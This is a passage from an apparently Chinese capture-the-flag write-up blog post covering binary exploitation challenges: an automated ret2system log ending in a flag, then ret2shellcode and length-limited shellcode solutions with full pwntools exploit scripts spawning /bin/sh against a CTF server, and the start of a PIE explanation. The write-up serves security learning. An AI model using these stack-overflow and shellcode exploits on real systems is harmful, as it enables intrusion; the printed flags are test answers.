\u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;+] &#91;09:44:10] vulnerable function: vuln<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                   ASSEMBLY CODE ANALYSIS                   \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] &#91;09:44:10] disassembling function: vuln<br>080491c1 &lt;vuln&gt;:<br> 80491c1:       push   ebp<br> 80491c2:       mov    ebp,esp<br> 80491c4:       push   ebx<br> 80491c5:       sub    esp,0x24<br> 80491c8:       call   80490d0 &lt;__x86.get_pc_thunk.bx&gt;<br> 80491cd:       add    ebx,0x2e27<br> 80491d3:       sub    esp,0xc<br> 80491d6:       lea    eax,&#91;ebx-0x1fe4]<br> 80491dc:       push   eax<br> 80491dd:       call   8049060 &lt;printf@plt&gt;<br> 80491e2:       add    esp,0x10<br> 80491e5:       sub    esp,0x4<br> 80491e8:       push   0x64<br> 80491ea:       lea    eax,&#91;ebp-0x1c]<br> 80491ed:       push   eax<br> 80491ee:       push   0x0<br> 80491f0:       call   8049050 &lt;read@plt&gt;<br> 80491f5:       add    esp,0x10<br> 80491f8:       nop<br> 80491f9:       mov    ebx,DWORD PTR &#91;ebp-0x4]<br>--<br> 804925a:       call   80491c1 &lt;vuln&gt;<br> 804925f:       mov    eax,0x0<br> 8049264:       lea    esp,&#91;ebp-0x8]<br> 8049267:       pop    ecx<br> 8049268:       pop    ebx<br> 8049269:       pop    ebp<br> 804926a:       lea    esp,&#91;ecx-0x4]<br> 804926d:       ret<br><br>0804926e &lt;__x86.get_pc_thunk.ax&gt;:<br> 804926e:       mov    eax,DWORD PTR &#91;esp]<br> 8049271:       ret<br><br>Disassembly of section .fini:<br><br>08049274 &lt;_fini&gt;:<br> 8049274:       push   ebx<br> 8049275:       sub    esp,0x8<br> 8049278:       call   80490d0 &lt;__x86.get_pc_thunk.bx&gt;<br> 804927d:       add    ebx,0x2d77<br> 8049283:       add    esp,0x8<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                      STRING ANALYSIS                       \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] &#91;09:44:10] searching for \/bin\/sh string in binary<br>&#91;*] &#91;09:44:10] checking for \/bin\/sh string<br>&#91;+] &#91;09:44:10] \/bin\/sh string found in binary<br>&#91;*] &#91;09:44:10] testing for stack overflow vulnerability<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                  STACK OVERFLOW DETECTION                  \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] Testing overflow: &#91;\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588] 100%&#91;*] &#91;09:44:10] <br>&#91;+] &#91;09:44:10] stack overflow detected! Padding: 32 bytes<br>&#91;*] &#91;09:44:10] performing assembly-based overflow analysis<br>&#91;+] &#91;09:44:10] stack size: 28 bytes<br>&#91;+] &#91;09:44:10] overflow padding adjustment: 32 bytes<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502                     EXPLOITATION PHASE                     \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] &#91;09:44:10] initializing exploitation attempts<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502             REMOTE STACK OVERFLOW EXPLOITATION             \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;*] &#91;09:44:10] targeting remote service at ctf.ctbu.edu.cn:34196<br><br>\u250c\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2510<br>\u2502           EXPLOITATION: ret2system - x32 Remote            \u2502<br>\u2514\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2500\u2518<br>&#91;PAYLOAD] &#91;09:44:10] preparing ret2system exploit<br>&#91;*] &#91;09:44:10] system address: 0x8049070<br>&#91;*] &#91;09:44:10] \/bin\/sh address: 0x804a008<br>&#91;CRITICAL] &#91;09:44:10] EXPLOITATION SUCCESSFUL! Dropping to shell...<br>Encat flag<br>coctf{ret2flag_640a465c2af5}<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">ret2shellcode<\/h3>\n\n\n\n<p>\u62ff\u5230\u9644\u4ef6<\/p>\n\n\n\n<p>\u517b\u6210\u4e60\u60ef\uff0c\u5148\u770b\u4fdd\u62a4<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>Arch:       amd64-64-little<br>RELRO:      Partial RELRO<br>Stack:      No canary found<br>NX:         NX enabled<br>PIE:        No PIE (0x400000)<br>Stripped:   No<\/code><\/pre>\n\n\n\n<p>64\u4f4d\u67b6\u6784\uff0c\u57fa\u672c\u4e0a\u6ca1\u6709\u4fdd\u62a4<\/p>\n\n\n\n<p>IDA\u6253\u5f00\uff0cmain\u51fd\u6570F5\u53cd\u7f16\u8bd1<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-25-1024x322.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"322\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-25-1024x322.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-679\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u524d\u9762\u4e09\u884c\u5f88\u666e\u901a\uff0c\u86ee\u5e38\u89c1\u7684\uff0c\u6682\u4e14\u5ffd\u7565<\/p>\n\n\n\n<p>\u540e\u9762\u7684\u51e0\u4e2a\u51fd\u6570\u8fd8\u662f\u86ee\u5e38\u89c4\u7684\uff0c\u552f\u4e00\u663e\u5f97\u6709\u70b9\u964c\u751f\u7684\u53ea\u4f1a\u662f\u8fd9\u4e2amprotect<\/p>\n\n\n\n<p>\u4e3a\u4ec0\u4e48\u4e0d\u641c\u4e00\u641c\u5462\uff08\u5b9e\u9645\u4e0a\u76f4\u63a5\u641c\u8fd9\u4e00\u884c\u7684\u5185\u5bb9\uff0c\u5c31\u80fd\u641c\u5230\u57fa\u672c\u4e0a\u5c0f\u6539\u52a8\u5c31\u80fd\u7528\u7684exp\uff0c\u6bcd\u9898wp\u53c2\u8003[<a href=\"https:\/\/blog.csdn.net\/weixin_61995249\/article\/details\/130790592\">HNCTF 2022 Week1]ret2shellcode-CSDN\u535a\u5ba2<\/a>\uff09<\/p>\n\n\n\n<p>\u5b9e\u5728\u4e0d\u884c\uff0c\u76f4\u63a5\u95eeai<\/p>\n\n\n\n<p>okabe\uff1amprotect((void *)((unsigned <em>_int64)&amp;<\/em>bss_start &amp; 0xFFFFFFFFFFFFF000LL), 0x1000uLL, 7); \u4ec0\u4e48\u610f\u601d\uff1f<\/p>\n\n\n\n<p>AI\uff1a\u8fd9\u6761\u4ee3\u7801\u7684\u4f5c\u7528\u662f\uff1a\u5c06 <code>_bss<\/code> \u6bb5\u8d77\u59cb\u5730\u5740\u6240\u5728\u7684 <strong>4KB \u5185\u5b58\u9875<\/strong>\uff08\u5411\u4e0b\u5bf9\u9f50\u5230 4KB \u8fb9\u754c\uff09\u8bbe\u7f6e\u4e3a <strong>\u53ef\u8bfb\u3001\u53ef\u5199\u3001\u53ef\u6267\u884c<\/strong> \u6743\u9650<\/p>\n\n\n\n<p>\u53ef\u8bfb\u53ef\u5199\u53ef\u6267\u884c\uff0c\u662f\u4efb\u4f55\u7535\u8111\u64cd\u4f5c\u4e2d\u76f8\u5f53\u9ad8\u7684\u6743\u9650\u4e86<\/p>\n\n\n\n<p>\u800c\u5982\u679c\u4f60\u6ee1\u6000\u597d\u5947\u5fc3\u7684\u53cc\u51fb\u4e86buff<\/p>\n\n\n\n<p>\u6b38\uff1f\u4f60\u770b\u770b\u5b83\u653e\u7f6e\u5728\u54ea\u7684\u5462\uff1f<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-24-1024x143.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"143\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-24-1024x143.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-678\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u4e0d\u5c31\u662fbss\u6bb5\u7684\u5417\uff0c\u4e5f\u5c31\u662f\u8bf4\uff0cbuff\u91cc\u7684\u5185\u5bb9\uff0c\u5177\u6709\u53ef\u8bfb\u53ef\u5199\u53ef\u6267\u884c\u7684\u6743\u9650<\/p>\n\n\n\n<p>\u90a3\u4e48\u6211\u4eec\u60f3\u8981\u83b7\u53d6\u5230shell\u7684\u8bdd\uff0c\u4e5f\u53ea\u9700\u8981\u5f80buff\u5199\u5165\u80fd\u591f\u6253\u5f00shell\u7684\u5185\u5bb9\u5c31\u597d<\/p>\n\n\n\n<p>\u8fd9\u4e2a\u5185\u5bb9\uff0c\u88ab\u6211\u4eec\u79f0\u4e4b\u4e3ashellcode<\/p>\n\n\n\n<p>\u7531\u4e8epwntools\u5df2\u7ecf\u4e3a\u6211\u4eec\u96c6\u6210\u4e86shellcode\u7684\u7f16\u5199\u64cd\u4f5c<\/p>\n\n\n\n<p>\u6240\u4ee5\u6211\u4eec\u53ea\u9700\u8981\u8c03\u7528\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>\u597d\u4e86\uff0c\u600e\u4e48\u63a7\u5236\u597d\u8bf4\uff0cshellcode\u77e5\u9053\u5f80\u54ea\u653e\u4e86\uff0c\u90a3\u600e\u4e48\u8ba9\u7a0b\u5e8f\u6d41\u8d70\u5230\u6211\u4eec\u653e\u7f6eshellcode\u7684\u4f4d\u7f6e\u5462\uff1f<\/p>\n\n\n\n<p>\u8fd8\u662f\u6808\u6ea2\u51fa\u642d\u914d\u8986\u76d6\u8fd4\u56de\u5730\u5740\u7684\u65b9\u6cd5<\/p>\n\n\n\n<p>\u6211\u4eec\u5728main\u51fd\u6570\u91cc\u80fd\u770b\u5230\u6570\u7ec4s\u7684\u957f\u5ea6\u662f256\uff0c\u800c\u67b6\u6784\u662f64\u4f4d\u7684\uff0c\u6240\u4ee5\u5bf9\u5e94\u586b\u5145\u7684\u5783\u573e\u6570\u636e\u662f\uff1a256+8\uff0c\u4e5f\u5c31\u662f0x100+0x8 = 0x108<\/p>\n\n\n\n<p>\u8fd4\u56de\u5730\u5740\u5c31\u662fbuff\u7684\u5730\u5740<\/p>\n\n\n\n<p>exp\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br><br>context.arch = 'amd64'<br>context.log_level = 'debug'<br><br>r = process(\".\/attachment\")<br><br><br>buff_addr = 0x404080 <br><br>shellcode = asm(shellcraft.sh())        #\u5229\u7528pwntools\u751f\u6210shellcode<br># shellcode = b'\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\x6a\\x3b\\x58\\x99\\x0f\\x05'<br>ret = 0x0000000000401016<br><br><br>payload = shellcode.ljust(0x108, b'a') +p64(buff_addr)<br><br>r.sendline(payload)<br>r.interactive()<\/code><\/pre>\n\n\n\n<p>\u8fd9\u91cc\u7ed9\u51fa\u4e86\u53e6\u5916\u4e00\u4e2a\u77edshell\u65b9\u6cd5\uff0c\u8fd9\u4e2a\u64cd\u4f5c\u5728\u4e0b\u9898\u91cc\u540c\u6837\u9002\u7528<\/p>\n\n\n\n<h3 class=\"wp-block-heading\">shellcode_pro<\/h3>\n\n\n\n<p>\u8003\u70b9\uff1a\u8003\u5bdf\u9650\u5236\u957f\u5ea6\u7684shellcode<\/p>\n\n\n\n<p>\u4ea4\u4e92\u65f6\u7684\u4e2d\u6587\u5185\u5bb9\u867d\u7136\u6709\u70b9\u8c1c\u8bed\u4eba\u6027\u8d28<\/p>\n\n\n\n<p>\u4f46\u662f\u611f\u89c9\u8fd8\u662f\u5f88\u660e\u663e<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>$ .\/attachment<br>\u516b\u5948\u89c1\u674f\u83dc\u6700\u8fd1\u611f\u89c9\u81ea\u5df1\u53c8\u7a7f\u4e0d\u4e0b\u4ee5\u524d\u7684\u8863\u670d\u4e86<br>\u5979\u5411\u6e29\u6c34\u8bc9\u82e6\uff0c\u6e29\u6c34\u770b\u4e86\u770b\u5979<br>\u6697\u6697\u60f3\u9053\uff0c\u201c\u6709\u7684\u8863\u670d\u53ea\u80fd\u7531\u5c0f\u66b4\u98df\u6d77\u736d\u7a7f\u4e0a\u5462\u201d<br>\u7136\u540e\u60f3\u4e86\u60f3\u600e\u4e48\u624d\u80fd\u4e0d\u8ba9\u8001\u516b\u7ee7\u7eed\u6298\u817e<br>\u56de\u9053\uff1a\u201c\u5e94\u8be5\u662f\u8863\u670d\u7f29\u6c34\u4e86\u5427\u201d<br>What's this : &#91;0x7ffd7dd1f4e0] ?<br>Maybe it's useful ! But how to use it?<\/code><\/pre>\n\n\n\n<p>\u60f3\u7684\u662f\u8863\u670d\u7f29\u6c34\u4e86\uff0c\u6697\u793ashellcode\u7684\u957f\u5ea6\u53d7\u5230\u4e86\u9650\u5236\uff0c\u53d8\u5c0f\u4e86<\/p>\n\n\n\n<p>\u601d\u8def\u8fd8\u662f\u7c7b\u4f3c\u7684\uff0c\u6808\u6ea2\u51fa\uff0c\u8986\u76d6\u8fd4\u56de\u5730\u5740<\/p>\n\n\n\n<p>\u552f\u4e00\u7684\u5dee\u522b\u5c31\u662fshellcode\u7684\u957f\u5ea6\u53d7\u9650\u4e86<\/p>\n\n\n\n<p>\u8fd9\u91cc\u5c31\u9700\u8981\u9009\u624b\u81ea\u5df1\u901a\u8fc7\u641c\u7d22\u53bb\u627e\u77ed\u7684shellcode<\/p>\n\n\n\n<p>\u5b9e\u9645\u4e0a\uff0c\u610f\u8bc6\u5230\u4e86\u662fshellcode\u7684\u957f\u5ea6\u9650\u5236\u540e\uff0c\u5f88\u597d\u627e\u7684<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-23-1024x852.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"852\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-23-1024x852.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-677\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\u8fd9\u91cc\u768464\u4f4d\u77edshellcode\u5c31\u662f\u76f4\u63a5\u53ef\u7528\u7684<\/p>\n\n\n\n<p>exp\u91cc\u8fd8\u6709\u4e00\u4efd\u968f\u624b\u641c\u5230\u7684\u6c47\u7f16\u7ea7\u7684shellcode\uff0casm\u65b9\u6cd5\u5c31\u53ef\u7528\u4e86<\/p>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br><br>context(arch='amd64', os='linux' , log_level = 'debug')<br><br><br>p = remote(\"ctf.ctbu.edu.cn\", 32779)<br># \u542f\u52a8\u672c\u5730\u7a0b\u5e8f<br># p = process('.\/attachment')<br><br># \u63a5\u6536\u8f93\u51fa\u76f4\u5230\"What's this : &#91;\"\uff0c\u7136\u540e\u63d0\u53d6buf\u7684\u5730\u5740<br>p.recvuntil(\"What's this : &#91;\")<br>buf_addr_str = p.recvuntil(b']', drop=True)<br>buf_addr = eval(buf_addr_str)<br><br># \u8ba1\u7b97\u504f\u79fb\u91cf\uff1abuf\u5230\u8fd4\u56de\u5730\u5740\u7684\u8ddd\u79bb\u4e3a0x10\uff08buf\u5927\u5c0f\uff09 + 8\uff08\u4fdd\u5b58\u7684rbp\uff09 = 24\u5b57\u8282<br>offset = 24<br><br># 23\u5b57\u8282\u7684shellcode\uff0c\u7528\u4e8e\u6267\u884cexecve(\"\/bin\/sh\", 0, 0)<br># shellcode = b'\\x48\\x31\\xf6\\x56\\x48\\xbf\\x2f\\x62\\x69\\x6e\\x2f\\x2f\\x73\\x68\\x57\\x54\\x5f\\xb0\\x3b\\x99\\x0f\\x05'<br><br>shellcode  = asm(\"\"\" xor \trsi,\trsi\t\t\t<br>push\trsi\t\t\t\t<br>mov \trdi,\t0x68732f2f6e69622f\t <br>push\trdi<br>push\trsp\t\t<br>pop\trdi\t\t\t\t<br>mov \tal,\t59\t\t\t<br>cdq\t\t\t\t\t<br>syscall   \"\"\")<br><br>#\u7f51\u4e0a\u968f\u624b\u641c\u7684\u77edshellcode<br><br># \u6784\u9020payload\uff1a\u586b\u5145\u5b57\u8282\u3001\u8fd4\u56de\u5730\u5740\uff08\u6307\u5411shellcode\u8d77\u59cb\u4f4d\u7f6e\uff09\u3001shellcode<br>payload = b'A' * offset + p64(buf_addr + offset + 8) + shellcode<br><br># \u53d1\u9001payload<br>p.send(payload)<br><br># \u5207\u6362\u5230\u4ea4\u4e92\u6a21\u5f0f<br>p.interactive()<\/code><\/pre>\n\n\n\n<h3 class=\"wp-block-heading\">pie\u5b66\u957f\u4e0e\u5b66\u59b9\u4e0d\u5f97\u4e0d\u8bf4\u7684\u4e8c\u4e09\u4e8b<\/h3>\n\n\n\n<p>\u9898\u76ee\u540d\u79f0\u53ebpie\uff0c\u8003\u70b9\u662f\u5565\u5e94\u8be5\u5f88\u660e\u6670\u4e86<\/p>\n\n\n\n<figure class=\"wp-block-image size-full\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-22.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"965\" height=\"343\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-22.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-676\"  sizes=\"auto, (max-width: 965px) 100vw, 965px\" \/><\/div><\/figure>\n\n\n\n<p>out\u51fd\u6570\u662f\u51fa\u9898\u4eba\u8111\u5b50\u62bd\u4e86\u5199\u7684\u4e0d\u91cd\u8981\u7684\u6587\u5b57\u5185\u5bb9<\/p>\n\n\n\n<p>\u4e0d\u8fc7\u8fd8\u662f\u63d0\u5230\u4e86\u6709\u4ec0\u4e48\u4e1c\u897f\u6ca1\u53d8<\/p>\n\n\n\n<p>\u5982\u679c\u9009\u624b\u6709\u53bb\u641c\u7d22pie\u4fdd\u62a4<\/p>\n\n\n\n<p>\u53bb\u4e86\u89e3pie\u4fdd\u62a4\u540e\uff0c\u5c31\u77e5\u9053<\/p>\n\n\n\n<p>PIE\u5168\u79f0\u662fposition-independent executable\uff0c\u4e2d\u6587\u89e3\u91ca\u4e3a\u5730\u5740\u65e0\u5173\u53ef\u6267\u884c\u6587\u4ef6\uff0c\u8be5\u6280\u672f\u662f\u4e00\u4e2a\u9488\u5bf9\u4ee3\u7801\u6bb5\uff08.text\uff09\u3001\u6570\u636e\u6bb5\uff08.data\uff09\u3001\u672a\u521d\u59cb\u5316\u5168\u5c40\u53d8\u91cf\u6bb5\uff08.bss\uff09\u7b49\u56fa\u5b9a\u5730\u5740\u7684\u4e00\u4e2a\u9632\u62a4\u6280\u672f\uff0c\u5982\u679c\u7a0b\u5e8f\u5f00\u542f\u4e86PIE\u4fdd\u62a4\u7684\u8bdd\uff0c\u5728\u6bcf\u6b21\u52a0\u8f7d\u7a0b\u5e8f\u65f6\u90fd\u53d8\u6362\u52a0\u8f7d\u5730\u5740\uff0c\u4ece\u800c\u4e0d\u80fd\u901a\u8fc7ROPgadget\u7b49\u4e00\u4e9b\u5de5\u5177\u6765\u5e2e\u52a9\u89e3\u9898\u3002<\/p>\n\n\n\n<p>\u6211\u4eec\u77e5\u9053\uff0c\u5185\u5b58\u662f\u4ee5\u9875\u8f7d\u5165\u673a\u5236\uff0c\u5982\u679c\u5f00\u542fPIE\u4fdd\u62a4\u7684\u8bdd\uff0c\u53ea\u80fd\u5f71\u54cd\u5230\u5355\u4e2a\u5185\u5b58\u9875\uff0c\u4e00\u4e2a\u5185\u5b58\u9875\u5927\u5c0f\u4e3a0x1000\uff0c\u90a3\u4e48\u5c31\u610f\u5473\u7740\u4e0d\u7ba1\u5730\u5740\u600e\u4e48\u53d8\uff0c\u67d0\u4e00\u6761\u6307\u4ee4\u7684\u540e\u4e09\u4f4d\u5341\u516d\u8fdb\u5236\u6570\u7684\u5730\u5740\u662f\u59cb\u7ec8\u4e0d\u53d8\u7684\u3002\u56e0\u6b64\u6211\u4eec\u53ef\u4ee5\u901a\u8fc7\u8986\u76d6\u5730\u5740\u7684\u540e\u51e0\u4f4d\u6765\u53ef\u4ee5\u63a7\u5236\u7a0b\u5e8f\u7684\u6d41\u7a0b<\/p>\n\n\n\n<p>\u597d\uff0c\